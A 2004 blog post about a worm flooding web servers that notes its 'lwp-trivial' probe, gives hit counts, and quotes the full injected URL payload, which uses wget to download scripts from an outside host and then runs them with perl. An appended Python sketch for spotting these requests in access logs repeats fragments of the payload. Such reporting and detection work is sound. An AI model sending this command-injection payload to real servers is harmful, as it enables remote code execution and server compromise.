Saturday, December 25, 2004

Flood

There is a worm that targets Wordpress that is flooding servers. It refers to www.visualcoders.net and tries to run perl scripts. I noticed a huge increase in traffic today, and in an attempt to stem the flow, did a bit of searching. http://wordpress.org/support/7/19285 gives some tips.

The key is to stop the first probe that has a user-agent of "lwp-trivial". On my site it would grab one of the links and then attack it. If the first probe is stopped, however, the worm quits.

There was one hit on the 3rd, 11th and 17th of December, then just before 9AM PST the flood started. 303 different servers did 25,569 hits with the worm. The worm changes the &version and appends a &cmd to the url found in the page it gets from the first probe. Here is the added portion of the url, with linebreaks for readability:

"&version=http://www.visualcoders.net/spy.gif?
&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/zone.txt;
perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;
perl%20php.txt"

The Wordpress support seemed to indicate that the worm checked whether Wordpress was running before initiating the attack. I don't run Wordpress, so it doesn't seem to matter. In other words, most web servers will be generously donating bandwidth for nothing.
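
As an added example (not part of the original post), the Python sketch below tallies the two request types described above from an access log: the "lwp-trivial" probe and the follow-up requests that carry a remote &version= URL together with a &cmd= parameter. The Apache combined log format, IP addresses, paths and user-agent version strings are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample in Apache combined log format (documentation-range IPs,
# made-up paths, sizes and status codes); not taken from the author's logs.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Dec/2004:08:58:01 -0800] "GET / HTTP/1.0" 200 5120 "-" "lwp-trivial/1.35"
192.0.2.10 - - [25/Dec/2004:08:58:03 -0800] "GET /archive.php?id=4&version=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt HTTP/1.0" 200 5120 "-" "-"
192.0.2.10 - - [25/Dec/2004:08:58:04 -0800] "GET /archive.php?id=4&version=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp HTTP/1.0" 200 5120 "-" "-"
198.51.100.7 - - [25/Dec/2004:09:01:12 -0800] "GET / HTTP/1.0" 200 5120 "-" "LWP-Trivial/1.35"
198.51.100.7 - - [25/Dec/2004:09:01:15 -0800] "GET /links.php?version=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp HTTP/1.0" 404 312 "-" "-"
203.0.113.5 - - [25/Dec/2004:09:02:00 -0800] "GET /archive.php?id=4&version=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
not a log line
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
REMOTE_VERSION = re.compile(r'[?&]version=https?://', re.I)
CMD_PARAM = re.compile(r'[?&]cmd=', re.I)

def classify(url, ua):
    # First-stage probe: identified only by its user-agent.
    if ua.lower().startswith("lwp-trivial"):
        return "probe"
    # Follow-up hit: version= rewritten to a remote URL and cmd= appended.
    if REMOTE_VERSION.search(url) and CMD_PARAM.search(url):
        return "attack"
    return "other"

def summarize(log_text):
    probes, attacks, unparsed = Counter(), Counter(), 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            unparsed += 1  # keep count so malformed lines are not silently lost
            continue
        kind = classify(m["url"], m["ua"])
        if kind == "probe":
            probes[m["ip"]] += 1
        elif kind == "attack":
            attacks[m["ip"]] += 1
    return {
        "probe_hits": sum(probes.values()),
        "attack_hits": sum(attacks.values()),
        "attack_sources": len(attacks),
        "attackers_seen_probing": sorted(set(probes) & set(attacks)),
        "unparsed_lines": unparsed,
    }
```

Calling summarize() on a real log's text gives the hit and distinct-source counts of the kind quoted above, and shows which attacking addresses also sent the initial probe.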

